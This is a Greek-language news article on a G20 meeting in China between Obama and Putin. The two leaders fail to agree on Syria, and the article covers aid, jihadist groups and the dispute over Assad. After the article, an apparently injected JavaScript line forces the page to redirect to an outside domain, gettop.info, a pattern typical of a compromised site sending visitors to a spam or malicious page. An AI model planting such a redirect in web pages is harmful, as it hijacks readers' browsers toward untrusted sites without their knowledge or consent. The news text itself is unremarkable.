Δεν τα βρήκαν για τη Συρία Ομπάμα-Πούτιν

0
5

 

Στο περιθώριο της G20 στην Κίνα συναντήθηκαν σήμερα οι Μπαράκ Ομπάμα και Βλαντίμιρ Πούτιν και όπως ήδη διαφαινόταν δεν κατέληξαν σε μια συμφωνία για τη Συρία, σύμφωνα και με διπλωματική πηγή.

Η συνάντηση ,έγινε έπειτα από νέες διαπραγματεύσεις μεταξύ των υπουργών Εξωτερικών των δύο χωρών Τζον Κέρι και Σεργκέι Λαβρόφ, οι οποίοι επίσης δεν κατέληξαν σε μια συμφωνία λόγω των αποκλίσεων που επιμένουν, δήλωσε Αμερικανός διπλωμάτης.

Οι Ομπάμα και Πούτιν συνομίλησαν περίπου 90 λεπτά σε μια εποικοδομητική συνάντηση για την αποστολή ανθρωπιστικής βοήθειας στη χώρα, τη μείωση της βίας και τη συνεργασία στην καταπολέμηση τζιχαντιστικών οργανώσεων, δήλωσε ανώτερος Αμερικανός αξιωματούχος στους δημοσιογράφους.

Χθες, η Ουάσιγκτον κατηγόρησε τη Μόσχα ότι «υπαναχώρησε» σε ορισμένα σημεία στις διαπραγματεύσεις, καθιστώντας αδύνατη επί του παρόντος μια συμφωνία συνεργασίας μεταξύ των δύο μεγάλων δυνάμεων.

Η Μόσχα και η Ουάσιγκτον, που πραγματοποιούν χωριστά επιδρομές κατά των τζιχαντιστών στη Συρία, διαφωνούν κυρίως για την τύχη του Σύρου προέδρου Μπασάρ αλ-Ασαντ, ενώ το καθεστώς της Δαμασκού συνεχίζει να θέτει στόχο των επιχειρήσεών του τη συριακή αντιπολίτευση έχοντας την υποστήριξη της Ρωσίας, άλλο μήλο της έριδος με τις ΗΠΑ.

Σύμφωνα με διπλωμάτη που μίλησε μετά τη συνάντηση μεταξύ των Ομπάμα και Πούτιν, η επίτευξη συμφωνίας φαίνεται να είναι δύσκολη.

 

 

  setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here